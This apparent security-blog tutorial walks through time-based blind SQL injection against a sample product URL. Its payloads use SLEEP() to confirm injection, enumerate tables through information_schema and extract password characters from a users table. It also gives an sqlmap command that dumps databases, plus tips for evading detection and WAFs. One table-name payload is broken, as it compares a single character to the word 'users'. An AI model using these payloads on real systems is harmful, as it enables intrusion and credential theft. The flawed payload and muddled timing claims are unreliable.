Blind SQL Injection: Identifying Slow Queries

G5 Cyber Security

2 weeks ago

TL;DR

Blind SQL injection happens when you can’t see the results of your query directly, but you can tell if it’s true or false based on how long the server takes to respond. Heavy queries are a key sign – they mean the database is working harder than usual. This guide shows you how to find those slow queries and use them to extract information.

Understanding Blind SQL Injection

With blind SQL injection, instead of getting data back directly (like in regular SQL injection), you send requests that cause different behaviours on the server. The most common behaviour is a change in response time. If your query is true, it might take longer to respond; if false, quicker.

Identifying Heavy Queries

Initial Probe: Start with a simple request that you *know* will be true. For example, if the application uses an ID parameter:
```
http://example.com/product?id=1
```
Record the response time.
Introduce a Time Delay: Add a delay to your query using SQL functions like SLEEP() (MySQL), pg_sleep() (PostgreSQL) or WAITFOR DELAY '0:00:5' (SQL Server). Try something like:
```
http://example.com/product?id=1 AND SLEEP(5)
```
If the response time increases by approximately 5 seconds, you’ve confirmed that SQL injection is possible and the server executes your commands.
Boolean-Based Injection: Use conditions that evaluate to true or false. For example:
```
http://example.com/product?id=1 AND 'a'='a'
```
This should be similar in response time to the initial probe.
```
http://example.com/product?id=1 AND 'a'!='a'
```
This *should* be faster, as it’s an impossible condition.
Time-Based Injection: This is where you really look for heavy queries. Use a time delay based on a condition:
```
http://example.com/product?id=1 AND IF(substring(database(), 1, 1) = 'a', SLEEP(5), 0)
```
This query sleeps for 5 seconds if the first letter of the database name is ‘a’. If it’s not ‘a’, there’s no delay.
Automate Querying: Manually testing each character is slow. Use tools like:
- sqlmap: A powerful automated SQL injection tool. It can detect and exploit various types of SQL injection vulnerabilities, including blind injections.
```
sqlmap -u "http://example.com/product?id=1" --dbs
```
- Burp Suite Intruder: Configure Burp to send a series of requests with different payloads for the id parameter, measuring response times.

Interpreting Response Times

Significant Delays: A delay consistently around your specified sleep time (e.g., 5 seconds) indicates the condition is true.
Small Variations: Ignore minor variations in response time caused by network fluctuations or server load. Focus on consistent, noticeable differences.
False Positives: Be aware of caching. Clear your browser cache and use a different session for testing to avoid misleading results.

Extracting Information

Database Name: Start with the database name, then table names, column names, and finally data.
```
http://example.com/product?id=1 AND IF(substring(database(), 1, 1) = 'a', SLEEP(5), 0)
```

Table Names: Once you know the database name:

http://example.com/product?id=1 AND IF(substring((SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' LIMIT 0, 1), 1, 1) = 'users', SLEEP(5), 0)

Column Names: Repeat the process for column names within each table.

Data Extraction: Finally, extract data from specific columns:

http://example.com/product?id=1 AND IF(substring((SELECT password FROM users LIMIT 0, 1), 1, 1) = 'a', SLEEP(5), 0)

Important Considerations

Rate Limiting: Be careful not to overload the server with too many requests. Implement delays between queries to avoid detection and denial-of-service issues.
Error Handling: The application might have error handling that masks SQL injection attempts. Look for subtle differences in error messages or page content.
WAFs (Web Application Firewalls): WAFs can block common SQL injection payloads. Try different encoding techniques and evasion methods.